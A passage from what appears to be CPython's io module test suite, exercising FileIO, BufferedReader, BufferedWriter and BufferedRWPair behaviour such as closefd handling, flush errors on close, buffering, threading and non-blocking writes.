with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
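# Subtracting the buffer size leaves the fixed per-object overhead, which
# should stay the same regardless of buffer_size.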
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
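# rawio._reads (an attribute of the MockRawIO test helper) counts raw read()
# calls; read1() should serve data from the buffer and trigger at most one
# raw read per call.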
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
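# Each entry: [buffer size, sizes requested from the buffered read(),
# expected sizes of the resulting raw reads].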
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550: when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. on a socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so
# checking this is not as easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
